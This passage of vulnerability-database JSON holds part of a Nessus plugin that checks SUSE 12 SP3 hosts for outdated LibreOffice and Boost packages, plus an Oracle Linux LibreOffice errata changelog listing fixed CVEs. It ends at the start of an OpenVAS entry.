value:\"p-cpe:/a:novell:suse_linux:gnome-documents\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:gnome-documents-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:gnome-documents_books-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:gnome-documents_books-common-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:gnome-shell-search-provider-documents\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libboost_atomic1_54_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libboost_atomic1_54_0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libboost_date_time1_54_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libboost_date_time1_54_0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libboost_filesystem1_54_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libboost_filesystem1_54_0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libboost_iostreams1_54_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libboost_iostreams1_54_0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libboost_locale1_54_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libboost_locale1_54_0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libboost_program_options1_54_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libboost_program_options1_54_0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libboost_random1_54_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libboost_random1_54_0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libboost_regex1_54_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libboost_regex1_54_0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libboost_signals1_54_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libboost_signals1_54_0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libboost_system1_54_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libboost_system1_54_0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libboost_thread1_54_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libboost_thread1_54_0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libepubgen-0_1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libepubgen-0_1-1-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libepubgen-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libixion-0_13\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libixion-0_13-0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libixion-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libmwaw-0_3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libmwaw-0_3-3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libmwaw-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:liborcus-0_13\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:liborcus-0_13-0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:liborcus-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libqxp-0_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libqxp-0_0-0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libqxp-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libreoffice\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libreoffice-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libreoffice-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libreoffice-base-drivers-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libreoffice-base-drivers-mysql-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libreoffice-base-drivers-postgresql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libreoffice-base-drivers-postgresql-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libreoffice-calc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libreoffice-calc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libreoffice-calc-extensions\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libreoffice-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libreoffice-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libreoffice-draw\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libreoffice-draw-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libreoffice-filters-optional\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libreoffice-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libreoffice-gnome-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libreoffice-gtk2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libreoffice-gtk2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libreoffice-impress\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libreoffice-impress-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libreoffice-mailmerge\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libreoffice-math\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libreoffice-math-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libreoffice-officebean\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libreoffice-officebean-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libreoffice-pyuno\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libreoffice-pyuno-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libreoffice-writer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libreoffice-writer-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libreoffice-writer-extensions\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libstaroffice-0_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libstaroffice-0_0-0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libstaroffice-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwps-0_4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwps-0_4-4-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwps-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:myspell-dictionaries\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:myspell-lightproof-en\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:myspell-lightproof-hu_HU\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:myspell-lightproof-pt_BR\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:myspell-lightproof-ru_RU\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/04/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/04/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = eregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! ereg(pattern:\"^(3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP3\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! ereg(pattern:\"^(3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP3\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libboost_atomic1_54_0-1.54.0-26.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libboost_date_time1_54_0-1.54.0-26.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libboost_iostreams1_54_0-1.54.0-26.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libboost_program_options1_54_0-1.54.0-26.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libboost_random1_54_0-1.54.0-26.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libboost_regex1_54_0-1.54.0-26.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libboost_signals1_54_0-1.54.0-26.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libboost_system1_54_0-1.54.0-26.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libboost_thread1_54_0-1.54.0-26.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libboost_atomic1_54_0-debuginfo-1.54.0-26.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libboost_date_time1_54_0-debuginfo-1.54.0-26.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libboost_iostreams1_54_0-debuginfo-1.54.0-26.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libboost_program_options1_54_0-debuginfo-1.54.0-26.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libboost_random1_54_0-debuginfo-1.54.0-26.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libboost_regex1_54_0-debuginfo-1.54.0-26.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libboost_signals1_54_0-debuginfo-1.54.0-26.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libboost_system1_54_0-debuginfo-1.54.0-26.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libboost_thread1_54_0-debuginfo-1.54.0-26.3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"gnome-documents-3.20.1-10.6.3\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"gnome-documents-debugsource-3.20.1-10.6.3\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"gnome-documents_books-common-3.20.1-10.6.3\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"gnome-documents_books-common-debuginfo-3.20.1-10.6.3\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"gnome-shell-search-provider-documents-3.20.1-10.6.3\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libboost_atomic1_54_0-1.54.0-26.3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libboost_atomic1_54_0-debuginfo-1.54.0-26.3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libboost_date_time1_54_0-1.54.0-26.3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libboost_date_time1_54_0-debuginfo-1.54.0-26.3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libboost_filesystem1_54_0-1.54.0-26.3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libboost_filesystem1_54_0-debuginfo-1.54.0-26.3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libboost_iostreams1_54_0-1.54.0-26.3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libboost_iostreams1_54_0-debuginfo-1.54.0-26.3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libboost_locale1_54_0-1.54.0-26.3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libboost_locale1_54_0-debuginfo-1.54.0-26.3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libboost_program_options1_54_0-1.54.0-26.3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libboost_program_options1_54_0-debuginfo-1.54.0-26.3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libboost_random1_54_0-1.54.0-26.3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libboost_random1_54_0-debuginfo-1.54.0-26.3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libboost_regex1_54_0-1.54.0-26.3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libboost_regex1_54_0-debuginfo-1.54.0-26.3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libboost_signals1_54_0-1.54.0-26.3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libboost_signals1_54_0-debuginfo-1.54.0-26.3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libboost_system1_54_0-1.54.0-26.3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libboost_system1_54_0-debuginfo-1.54.0-26.3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libboost_thread1_54_0-1.54.0-26.3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libboost_thread1_54_0-debuginfo-1.54.0-26.3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libepubgen-0_1-1-0.1.0-6.6.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libepubgen-0_1-1-debuginfo-0.1.0-6.6.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libepubgen-debugsource-0.1.0-6.6.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libixion-0_13-0-0.13.0-13.6.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libixion-0_13-0-debuginfo-0.13.0-13.6.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libixion-debugsource-0.13.0-13.6.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libmwaw-0_3-3-0.3.13-7.9.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libmwaw-0_3-3-debuginfo-0.3.13-7.9.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libmwaw-debugsource-0.3.13-7.9.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"liborcus-0_13-0-0.13.4-10.9.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"liborcus-0_13-0-debuginfo-0.13.4-10.9.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"liborcus-debugsource-0.13.4-10.9.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libqxp-0_0-0-0.0.1-1.3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libqxp-0_0-0-debuginfo-0.0.1-1.3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libqxp-debugsource-0.0.1-1.3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libreoffice-6.0.3.2-43.30.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libreoffice-base-6.0.3.2-43.30.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libreoffice-base-debuginfo-6.0.3.2-43.30.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libreoffice-base-drivers-mysql-6.0.3.2-43.30.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libreoffice-base-drivers-mysql-debuginfo-6.0.3.2-43.30.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libreoffice-base-drivers-postgresql-6.0.3.2-43.30.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libreoffice-base-drivers-postgresql-debuginfo-6.0.3.2-43.30.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libreoffice-calc-6.0.3.2-43.30.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libreoffice-calc-debuginfo-6.0.3.2-43.30.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libreoffice-calc-extensions-6.0.3.2-43.30.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libreoffice-debuginfo-6.0.3.2-43.30.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libreoffice-debugsource-6.0.3.2-43.30.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libreoffice-draw-6.0.3.2-43.30.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libreoffice-draw-debuginfo-6.0.3.2-43.30.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libreoffice-filters-optional-6.0.3.2-43.30.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libreoffice-gnome-6.0.3.2-43.30.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libreoffice-gnome-debuginfo-6.0.3.2-43.30.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libreoffice-gtk2-6.0.3.2-43.30.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libreoffice-gtk2-debuginfo-6.0.3.2-43.30.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libreoffice-impress-6.0.3.2-43.30.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libreoffice-impress-debuginfo-6.0.3.2-43.30.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libreoffice-mailmerge-6.0.3.2-43.30.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libreoffice-math-6.0.3.2-43.30.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libreoffice-math-debuginfo-6.0.3.2-43.30.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libreoffice-officebean-6.0.3.2-43.30.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libreoffice-officebean-debuginfo-6.0.3.2-43.30.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libreoffice-pyuno-6.0.3.2-43.30.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libreoffice-pyuno-debuginfo-6.0.3.2-43.30.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libreoffice-writer-6.0.3.2-43.30.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libreoffice-writer-debuginfo-6.0.3.2-43.30.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libreoffice-writer-extensions-6.0.3.2-43.30.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libstaroffice-0_0-0-0.0.5-7.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libstaroffice-0_0-0-debuginfo-0.0.5-7.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libstaroffice-debugsource-0.0.5-7.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libwps-0_4-4-0.4.7-10.7.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libwps-0_4-4-debuginfo-0.4.7-10.7.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libwps-debugsource-0.4.7-10.7.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"myspell-dictionaries-20180403-16.9.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"myspell-lightproof-en-20180403-16.9.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"myspell-lightproof-hu_HU-20180403-16.9.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"myspell-lightproof-pt_BR-20180403-16.9.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"myspell-lightproof-ru_RU-20180403-16.9.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Recommended update for LibreOffice\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "oraclelinux": [{"lastseen": "2018-08-31T01:48:15", "bulletinFamily": "unix", "description": "[1:5.0.6.2-15.0.1]\n- Replaced RedHat colors with Oracle colors, and the filename redhat.soc with oracle.soc in specfile\n- Build with --with-vendor='Oracle America, Inc.'\n[1:5.0.6.2-15]\n- Resolves: rhbz#1545034 - CVE-2018-1055 CVE-2018-6871\n[1:5.0.6.2-14]\n- Resolves: rhbz#1454693 segv on interrupting tiled rendering\n[1:5.0.6.2-13]\n- Related: rhbz#1444437 remove timer if document closed before it fires\n[1:5.0.6.2-12]\n- Resolves: rhbz#1454598 crash on selecting bullet from toolbar\n[1:5.0.6.2-11]\n- Related: rhbz#1444437 restart second instance cleanly\n[1:5.0.6.2-10]\n- Resolves: rhbz#1444437 segv in gnome-documents integration\n[1:5.0.6.2-9]\n- Resolves: rhbz#1445635 CVE-2017-7870 Heap-buffer-overflow in\n tools::Polygon::Insert\n[1:5.0.6.2-8]\n- Resolves: rhbz#1437537 fix csv a11y\n[1:5.0.6.2-7]\n- Resolves: rhbz#1431539 gnome-documents needs libreofficekit\n- Resolves: rhbz#1435535 CVE-2017-3157 Arbitrary file disclosure in\n Calc and Writer\n[1:5.0.6.2-6]\n- Resolves: rhbz#1401082 gnome hangs opening certain docx\n- Resolves: rhbz#1421726 drop use of CAIRO_OPERATOR_DIFFERENCE", "modified": "2018-03-07T00:00:00", "published": "2018-03-07T00:00:00", "id": "ELSA-2018-0418", "href": "http://linux.oracle.com/errata/ELSA-2018-0418.html", "title": "libreoffice security update", "type": "oraclelinux", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2019-03-18T14:24:05", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2018-02-15T00:00:00", "id": "OPENVAS:1361412562310874116", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874116", "title": "Fedora Update for libreoffice FEDORA-2018-3eb4d8e4c4", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: 